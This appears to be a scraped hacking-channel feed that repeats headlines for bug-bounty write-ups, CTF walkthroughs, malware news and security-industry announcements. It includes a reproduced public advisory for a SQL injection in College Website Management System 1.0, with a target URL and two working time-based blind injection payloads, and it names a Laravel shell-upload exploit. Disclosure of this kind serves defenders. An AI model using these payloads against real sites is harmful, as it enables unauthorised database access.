Hacking on Medium
Top 25 Subdomain Takeover Bug Bounty Reports
https://cdn-images-1.medium.com/max/1920/1*GE8U3baA4Y15QSMygJYt6w.png
In this article, we will discuss the Subdomain Takeover attack, and present 25 disclosed reports based on this flaw.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Top 25 Subdomain Takeover Bug Bounty Reports
https://cdn-images-1.medium.com/max/1920/1*GE8U3baA4Y15QSMygJYt6w.png
In this article, we will discuss the Subdomain Takeover attack, and present 25 disclosed reports based on this flaw.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Top 25 Subdomain Takeover Bug Bounty Reports
In this article, we will discuss the Subdomain Takeover attack, and present 25 disclosed reports based on this flaw.
Hacking on Medium
Bounty Hacker Tryhackme
https://cdn-images-1.medium.com/max/2600/0*js1nt9cVrM3ibq8-
CTF Writeup
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Bounty Hacker Tryhackme
https://cdn-images-1.medium.com/max/2600/0*js1nt9cVrM3ibq8-
CTF Writeup
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Bounty Hacker Tryhackme
CTF Writeup
Hacking on Medium
Yes, your podcast does need a website
https://cdn-images-1.medium.com/max/1600/1*2q4TA1YQftn_0ibJf9R7Og.png
How to stand out from the hobbyists
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Yes, your podcast does need a website
https://cdn-images-1.medium.com/max/1600/1*2q4TA1YQftn_0ibJf9R7Og.png
How to stand out from the hobbyists
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Yes, your podcast does need a website
How to stand out from the hobbyists
Hacking on Medium
TryHackMe ‘Ignite’ Room Walkthrough
https://cdn-images-1.medium.com/max/877/1*j0rUxUSbWiA5s5oqAL4ZYg.png
“Root the box! Designed and created by DarkStar7471, built by Paradox.”
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe ‘Ignite’ Room Walkthrough
https://cdn-images-1.medium.com/max/877/1*j0rUxUSbWiA5s5oqAL4ZYg.png
“Root the box! Designed and created by DarkStar7471, built by Paradox.”
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe ‘Ignite’ Room Walkthrough
“Root the box! Designed and created by DarkStar7471, built by Paradox.”
Hacking on Medium
HTB: Poison Writeup w/o Metasploit
https://cdn-images-1.medium.com/max/800/0*gw220D_f4gAIvS-l
Let’s skip the introduction and jump right into the writeup.
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
HTB: Poison Writeup w/o Metasploit
https://cdn-images-1.medium.com/max/800/0*gw220D_f4gAIvS-l
Let’s skip the introduction and jump right into the writeup.
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HTB: Poison Writeup w/o Metasploit
Let’s skip the introduction and jump right into the writeup.
Hacking on Medium
El nuevo malware de limpieza de datos CaddyWiper llega a las redes ucranianas
https://cdn-images-1.medium.com/max/1755/0*QVsP7IsIpwJOmo_W
PUBLICADO EN 15 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
El nuevo malware de limpieza de datos CaddyWiper llega a las redes ucranianas
https://cdn-images-1.medium.com/max/1755/0*QVsP7IsIpwJOmo_W
PUBLICADO EN 15 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
El nuevo malware de limpieza de datos CaddyWiper llega a las redes ucranianas
PUBLICADO EN 15 MARZO, 2022POR EHACKING
How I managed to trigger XSS automatically to get critical account takeover
Hello everybody! This is my first medium post so I hope you like it.Continue reading on Medium »
Read more...
Hello everybody! This is my first medium post so I hope you like it.Continue reading on Medium »
Read more...
How I managed to trigger XSS automatically to get critical account takeover
https://medium.com/@c4rrilat0r/how-i-managed-to-trigger-xss-automatically-to-get-critical-account-takeover-92ea3abcaf9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@c4rrilat0r/how-i-managed-to-trigger-xss-automatically-to-get-critical-account-takeover-92ea3abcaf9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I managed to trigger XSS automatically to get critical account takeover
Hello everybody! This is my first medium post so I hope you like it.
Hello everybody! This is my first medium post so I hope you like it.Continue reading on Medium » (https://medium.com/@c4rrilat0r/how-i-managed-to-trigger-xss-automatically-to-get-critical-account-takeover-92ea3abcaf9?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I managed to trigger XSS automatically to get critical account takeover
Hello everybody! This is my first medium post so I hope you like it.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
College Website Management System 1.0 SQL Injection
https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
College Website Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
College Website Management System 1.0 SQL Injection
https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png
College Website Management System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
0d24d3675c92cd6b4566d20cd36be0d8Download
# Exploit Title: College Website Management System 1.0 - SQL Injection
# Date: 12/03/2022
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux
Title:
================
College Website Management System 1.0 - SQL Injection
Summary:
================
The College Website Management System application in version 1.0 is
vulnerable to SQL injection allowing the attacker to make requests to the
database.
Severity Level:
================
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Affected Product:
================
College Website Management System v1.0
Steps to Reproduce:
================
1. Open your browser and go to
http://target/cwms/admin/?page=articles/view_article&id=1.
2. In the "id" parameter add the following payload:
' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc
After that, the server will only respond after 10 seconds have passed.
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=articles/view_article&id=1' AND (SELECT 2016 FROM
(SELECT(SLEEP(5)))kbJu) AND 'SfwZ'='SfwZ
---
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
College Website Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Laravel Media Library Pro 2.1.6 Shell Upload
https://4.bp.blogspot.com/-yT3eHciMBDw/WWlvGfUXh9I/AAAAAAAAILU/lYidSj08G0suEfC69x80tZFrj-NYN5F9wCLcBGAs/s1600/h137.png
Laravel Media Library Pro versions 2.1.6 and below as well as 1.17.10 and below suffer from a remote shell upload vulnerability.
MD5 |
Download
# Exploit Title: Laravel Media Library Pro <=2.1.6
# Google Dork: -
# Date: Mar 13, 2022
# Exploit Author: Kelvin Yip
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Laravel Media Library Pro 2.1.6 Shell Upload
https://4.bp.blogspot.com/-yT3eHciMBDw/WWlvGfUXh9I/AAAAAAAAILU/lYidSj08G0suEfC69x80tZFrj-NYN5F9wCLcBGAs/s1600/h137.png
Laravel Media Library Pro versions 2.1.6 and below as well as 1.17.10 and below suffer from a remote shell upload vulnerability.
MD5 |
1228b251a7f271fd7da635499b0bd342Download
# Exploit Title: Laravel Media Library Pro <=2.1.6
# Google Dork: -
# Date: Mar 13, 2022
# Exploit Author: Kelvin Yip
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Laravel Media Library Pro 2.1.6 Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
OneLayer Secures $8.2M Seed Round to Protect Private 5G Networks
OneLayer plans to use the funds to build its product suite.
___________________________
@hacking_Attack
@Hacking_Video
OneLayer Secures $8.2M Seed Round to Protect Private 5G Networks
OneLayer plans to use the funds to build its product suite.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
OneLayer Secures $8.2M Seed Round to Protect Private 5G Networks
OneLayer plans to use the funds to build its product suite.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Fortress Information Security’s New Trust Center Allows Suppliers to Bridge the Cyber Communication Gap with Patrons
Suppliers participating in the A2V Library now have a powerful new information-sharing tool.
___________________________
@hacking_Attack
@Hacking_Video
Fortress Information Security’s New Trust Center Allows Suppliers to Bridge the Cyber Communication Gap with Patrons
Suppliers participating in the A2V Library now have a powerful new information-sharing tool.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Fortress Information Security’s New Trust Center Allows Suppliers to Bridge the Cyber Communication Gap with Patrons
Suppliers participating in the A2V Library now have a powerful new information-sharing tool.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
SecZetta Launches Complimentary Third-Party Identity Risk Maturity Assessment at HIMSS
___________________________
@hacking_Attack
@Hacking_Video
SecZetta Launches Complimentary Third-Party Identity Risk Maturity Assessment at HIMSS
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
SecZetta Launches Complimentary Third-Party Identity Risk Maturity Assessment at HIMSS